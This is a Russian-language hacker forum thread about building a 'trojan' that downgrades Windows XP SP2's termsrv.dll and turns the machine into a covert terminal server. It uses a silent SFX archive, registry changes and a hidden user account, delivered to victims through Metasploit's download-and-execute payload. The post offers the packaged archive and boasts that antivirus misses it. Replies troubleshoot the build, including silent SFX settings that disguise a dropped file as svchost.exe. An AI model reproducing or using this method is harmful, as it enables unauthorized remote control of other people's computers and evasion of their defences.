![]() |
Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)
Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких) Предисловие. Многие знают, что из WIN-XP можно сделать сервер терминалов и подключаться по сети к удалённому рабочему столу удалённо, работая в отдельной ссесии с графическим интерфейсом, при этом не отключая локального пользователя. То есть в итоге мы получаем возможность входа ещё одного пользователя в систему, только удалённого. ссылка по теме: http://www.xakep.ru/post/28531/default.asp В случае прямого доступа к компьютеру это сделать несложно, заменив одну dll (termsrv.dll), настроив политики безопасности, разрешив удалённый рабочий стол и т. д. Наша задача провернуть всё это удалённо, имея только cmd-шелл. 1. Подготовка Нам потребуется сама termsrv.dll от старой версии (не помню какой бетты) 5.1.2600.2055 - такая у меня, прямые руки и мозги в голове. Обратимся к статейке (не помню кто автор, откопаю ссылку-выложу тут, позже): Цитата:
2. Сборка трояна (down-patch`а) Итак приступим к сборке трояна от Meлкомягких:Ну вот, нужная инфа у нас есть. Используем обычный SFX-архив WinRAR, чтоб положить туда три файла: termsrv.dll - наша dll key.reg - файл настроек сервера терминалов run.cmd - сценарий, который сделает всё необходимое. Определимся с путём куда будет распаковываться наш архив. Я выбрал %WinDir%\Temp (есть у любой винды) Можно начинать писать файл run.cmd (ему мы передадим управление после распаковки SFX-архива) Заменить залоченную termsrv.dll, перезаписав её у нас не получится, но мы можем её переименовать! Цитата:
Цитата:
Цитата:
Берём нашу винду, запускаем regedit и экспортируем реестр. Далее делаем все настройки удалённого рабочего стола. а) разрешаем его: Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру. (ставим галку) б) разрешаем быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему ставим обе галки (использовать страницу приветствия, разрешить быстрое переключение пользователей) Кстати, надо сделать чтоб наш пользователь не отображался в этом приветствии, так как это сразу палево, поэтому сделаем его скрытым: Цитата:
Экспортируем реестр ещё раз, затем в TotalCommander сравниваем два файла реестра по содержимому, отслеживаем изменения и заносим их в блокнот. Сохраняем как файл key.reg Добавим туда (в начало) ещё то что, прилагалось в статье (настройка сервера терминалов и политики безопасности): Цитата:
То что у меня получилось (файл key.reg) , можно скачать тут (имхо его надо всё-таки почистить, много лишнего) Ну всё готово! Архивируем три файла (termsrv.dll, run.cmd, key.reg) WinRar`ом. Выставляем параметры: Цитата:
3. Впаривание трояна Используя пакет Metasplot Framework и уязвимости в Windows-XP вы можете попробовать обеспечить его загрузку (впаривание) с удалённого сервера и передачу ему управления. (полезная нагрузка win32_downloadexec) В общем как вы запустите его на компьютере жерты - это зависит от ваших знаний и везения. Один из способов описан мной в статье "Metasplot Framework часть 2 (или раздача троя)". Заключение. Вот так можно сделать downgrade системы Win-xp-sp2, превратив её в сервер терминалов. Конечно более-менее продвинутый пользователь заметит другого пользователя в системе, убьёт учётку, может сделать откат и т. д. Поэтому в серьёз данного трояна рассматривать не стоит. Кроме того dll ранней версии может быть заменена на новую при установке, добавлении компонентов из дистрибутива и т.д. Но в локалке такая переделка актуальна. Можно добавить его в автозагрузку - будет даунгрейдится каждый раз при запуске. Минус в том, что для вступления в силу изменений потребуется перезагрузка системы (можно добавить команду перезагрузки в run.cmd) и только потом будет возможно подключится к удалённому рабочему столу. P.S.Тут не рассмотренна проблема, которую может создать нестандартный файрвол при подключении к серверу терминалов. (у меня был и стандартный отключен) Скачать готовый SFX-архив terminal.exe (внутри всё необходимое) Антивирем не палится ;-) (и вряд ли когда будет). |
класс! только вот в чем проблемка... я пробывал на себе... в общем появляеться окошко, типо "Вставте диск №2", ну да ладно жму отмену и сохранить файлы. Но после перезагрузки новый пользователь не появляеться. Пробывал на остальных юзверях в общем с SP2 ваще не катит... с SP1 прокатило. И то! двух пользователей одновременно не поддерживает. В общем в чем the problem?
|
Цитата:
2. Проверь termsrv.dll - найди на системном диске все копии библиотеки и глянь версию, может всё-таки оригинальная используется и операция с заменой dll не прошла успешно... На неделе попробую на трёх системах WIN-XP, SP1, SP2, имхо там есть различие в функционировании службы защиты системных файлов, доведу сборку до ума, чтоб на всех трёх прокатывало... |
м... ну я еще не такой опытный... :) в общем благодаря этой статье идейка у меня появилась, сделать что-то подобное с радмином... в общем за ранее спасибо за доработанную сборку:)
|
Цитата:
|
Цитата:
|
Вот в чем проблема короче делаю SFX архив
коментарии: Path=C:\WINDOWS\Help\123\ SavePath Setup=C:\WINDOWS\Help\123\svchost.exe Setup=C:\WINDOWS\Help\123\111.bat Setup=123.exe Silent=1 Overwrite=2 А антивирус палит, в чем the problem? |
onikishov
Не понял, откуда ты взял этот sfx. сам создал и напичкал публичными вирями чтоли? ) Пользоваться надо sfx-сом -=lebed=- (Скачать) Внимательнее надо читать. З.Ы.: смотри не запусти случайно его у себя на компе ) |
Цитата:
|
Цитата:
|
| Время: 19:01 |